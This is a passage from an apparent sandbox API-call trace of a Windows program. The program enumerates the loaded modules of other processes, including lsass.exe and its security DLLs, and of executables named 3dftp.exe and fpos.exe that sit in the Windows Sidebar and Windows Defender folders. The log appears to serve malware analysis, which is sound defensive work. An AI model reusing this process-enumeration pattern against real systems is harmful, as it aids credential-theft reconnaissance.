nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0053.241] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0053.242] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x25d2850, cb=0x18 | out: lpmodinfo=0x25d2850*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0053.242] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0053.243] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0053.244] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x25d4a10, cb=0x18 | out: lpmodinfo=0x25d4a10*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0053.245] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0053.246] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0053.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb18) returned 0x218 [0053.247] EnumProcessModules (in: hProcess=0x218, lphModule=0x25d74a8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25d74a8, lpcbNeeded=0x41eb20) returned 1 [0053.248] GetModuleInformation (in: hProcess=0x218, hModule=0xb60000, lpmodinfo=0x25d7718, cb=0x18 | out: lpmodinfo=0x25d7718*(lpBaseOfDll=0xb60000, SizeOfImage=0x17000, EntryPoint=0xb614a1)) returned 1 [0053.248] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xb60000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="3dftp.exe") returned 0x9 [0053.248] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xb60000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\3dftp.exe" (normalized: "c:\\program files\\windows sidebar\\3dftp.exe")) returned 0x2a [0053.249] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25d9928, cb=0x18 | out: lpmodinfo=0x25d9928*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.249] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.249] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.250] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25dbae8, cb=0x18 | out: lpmodinfo=0x25dbae8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.250] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.250] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.251] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25ddca8, cb=0x18 | out: lpmodinfo=0x25ddca8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.251] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.251] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.252] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25dfe78, cb=0x18 | out: lpmodinfo=0x25dfe78*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.252] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.253] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.253] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa3c) returned 0x218 [0053.253] EnumProcessModules (in: hProcess=0x218, lphModule=0x25e2588, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25e2588, lpcbNeeded=0x41eb20) returned 1 [0053.254] GetModuleInformation (in: hProcess=0x218, hModule=0x940000, lpmodinfo=0x25e27f8, cb=0x18 | out: lpmodinfo=0x25e27f8*(lpBaseOfDll=0x940000, SizeOfImage=0x17000, EntryPoint=0x9414a1)) returned 1 [0053.254] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x940000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="fpos.exe") returned 0x8 [0053.254] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x940000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\fpos.exe" (normalized: "c:\\program files\\windows defender\\fpos.exe")) returned 0x2a [0053.255] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25e4a08, cb=0x18 | out: lpmodinfo=0x25e4a08*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.255] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.255] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.255] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25e6bc8, cb=0x18 | out: lpmodinfo=0x25e6bc8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.256] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.256] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.256] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25e8d88, cb=0x18 | out: lpmodinfo=0x25e8d88*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.257] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.257] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.258] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25eaf70, cb=0x18 | out: lpmodinfo=0x25eaf70*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.258] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.258] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.259] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x218 [0053.259] EnumProcessModules (in: hProcess=0x218, lphModule=0x25ed680, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25ed680, lpcbNeeded=0x41eb20) returned 1 [0053.269] GetModuleInformation (in: hProcess=0x218, hModule=0xff870000, lpmodinfo=0x25ed8f0, cb=0x18 | out: lpmodinfo=0x25ed8f0*(lpBaseOfDll=0xff870000, SizeOfImage=0xc000, EntryPoint=0xff871850)) returned 1 [0053.269] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff870000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="lsass.exe") returned 0x9 [0053.269] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff870000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\lsass.exe" (normalized: "c:\\windows\\system32\\lsass.exe")) returned 0x1d [0053.270] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25efae8, cb=0x18 | out: lpmodinfo=0x25efae8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.270] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.270] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.271] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x25f1ca8, cb=0x18 | out: lpmodinfo=0x25f1ca8*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0053.271] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0053.271] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0053.272] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25f3e78, cb=0x18 | out: lpmodinfo=0x25f3e78*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0053.272] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0053.272] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0053.273] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x25f6048, cb=0x18 | out: lpmodinfo=0x25f6048*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0053.273] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0053.274] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0053.274] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x25f8260, cb=0x18 | out: lpmodinfo=0x25f8260*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0053.275] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0053.275] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0053.276] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd560000, lpmodinfo=0x25fa420, cb=0x18 | out: lpmodinfo=0x25fa420*(lpBaseOfDll=0x7fefd560000, SizeOfImage=0xb000, EntryPoint=0x7fefd561510)) returned 1 [0053.276] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd560000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="SspiSrv.dll") returned 0xb [0053.277] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd560000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiSrv.dll" (normalized: "c:\\windows\\system32\\sspisrv.dll")) returned 0x1f [0053.278] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd3f0000, lpmodinfo=0x25fc5e0, cb=0x18 | out: lpmodinfo=0x25fc5e0*(lpBaseOfDll=0x7fefd3f0000, SizeOfImage=0x16a000, EntryPoint=0x7fefd3f3e04)) returned 1 [0053.279] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd3f0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="lsasrv.dll") returned 0xa [0053.279] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd3f0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\lsasrv.dll" (normalized: "c:\\windows\\system32\\lsasrv.dll")) returned 0x1e [0053.280] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x25fe7a0, cb=0x18 | out: lpmodinfo=0x25fe7a0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0053.280] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0053.281] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0053.282] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x26009f8, cb=0x18 | out: lpmodinfo=0x26009f8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0053.282] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0053.283] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0053.284] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2602bb8, cb=0x18 | out: lpmodinfo=0x2602bb8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0053.284] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0053.285] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0053.286] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x2604d88, cb=0x18 | out: lpmodinfo=0x2604d88*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0053.287] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0053.287] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0053.288] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2606f60, cb=0x18 | out: lpmodinfo=0x2606f60*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0053.289] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0053.290] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0053.291] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2609120, cb=0x18 | out: lpmodinfo=0x2609120*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0053.292] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0053.293] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0053.294] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x260b2d0, cb=0x18 | out: lpmodinfo=0x260b2d0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0053.295] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0053.296] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0053.297] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd330000, lpmodinfo=0x260d490, cb=0x18 | out: lpmodinfo=0x260d490*(lpBaseOfDll=0x7fefd330000, SizeOfImage=0xbd000, EntryPoint=0x7fefd33107c)) returned 1 [0053.298] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd330000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="SAMSRV.dll") returned 0xa [0053.299] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd330000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMSRV.dll" (normalized: "c:\\windows\\system32\\samsrv.dll")) returned 0x1e [0053.300] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd310000, lpmodinfo=0x260f650, cb=0x18 | out: lpmodinfo=0x260f650*(lpBaseOfDll=0x7fefd310000, SizeOfImage=0x14000, EntryPoint=0x7fefd314160)) returned 1 [0053.301] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd310000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="cryptdll.dll") returned 0xc [0053.302] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd310000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")) returned 0x20 [0053.303] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x2611938, cb=0x18 | out: lpmodinfo=0x2611938*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0053.304] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0053.305] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0053.306] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd2a0000, lpmodinfo=0x2613af8, cb=0x18 | out: lpmodinfo=0x2613af8*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0053.307] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0053.308] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0053.309] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x2615cb8, cb=0x18 | out: lpmodinfo=0x2615cb8*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0053.310] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0053.312] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0053.313] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x2617e78, cb=0x18 | out: lpmodinfo=0x2617e78*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0053.314] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0053.315] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0053.316] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd290000, lpmodinfo=0x261a038, cb=0x18 | out: lpmodinfo=0x261a038*(lpBaseOfDll=0x7fefd290000, SizeOfImage=0x9000, EntryPoint=0x7fefd291040)) returned 1 [0053.318] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="cngaudit.dll") returned 0xc [0053.319] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cngaudit.dll" (normalized: "c:\\windows\\system32\\cngaudit.dll")) returned 0x20 [0053.320] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd260000, lpmodinfo=0x261c208, cb=0x18 | out: lpmodinfo=0x261c208*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0053.322] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd260000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0053.323] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd260000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0053.326] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd210000, lpmodinfo=0x261e3c8, cb=0x18 | out: lpmodinfo=0x261e3c8*(lpBaseOfDll=0x7fefd210000, SizeOfImage=0x50000, EntryPoint=0x7fefd2111e0)) returned 1 [0053.327] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd210000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0053.329] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd210000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")) returned 0x1e [0053.330] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x2620588, cb=0x18 | out: lpmodinfo=0x2620588*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0053.331] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0053.333] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0053.334] GetModuleInformation (in: hProcess=0x218, hModule=0x75540000, lpmodinfo=0x2622748, cb=0x18 | out: lpmodinfo=0x2622748*(lpBaseOfDll=0x75540000, SizeOfImage=0x2000, EntryPoint=0x0)) returned 1 [0053.336] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75540000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="msprivs.DLL") returned 0xb [0053.337] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75540000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msprivs.DLL" (normalized: "c:\\windows\\system32\\msprivs.dll")) returned 0x1f [0053.339] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd180000, lpmodinfo=0x2624908, cb=0x18 | out: lpmodinfo=0x2624908*(lpBaseOfDll=0x7fefd180000, SizeOfImage=0x32000, EntryPoint=0x7fefd18144c)) returned 1 [0053.340] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd180000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="netjoin.dll") returned 0xb [0053.342] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd180000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")) returned 0x1f [0053.343] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd150000, lpmodinfo=0x2626ac8, cb=0x18 | out: lpmodinfo=0x2626ac8*(lpBaseOfDll=0x7fefd150000, SizeOfImage=0x24000, EntryPoint=0x7fefd1688c4)) returned 1 [0053.345] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd150000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="negoexts.DLL") returned 0xc [0053.347] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd150000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\negoexts.DLL" (normalized: "c:\\windows\\system32\\negoexts.dll")) returned 0x20 [0053.348] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x2628c98, cb=0x18 | out: lpmodinfo=0x2628c98*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0053.350] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0053.351] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0053.353] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x262ae70, 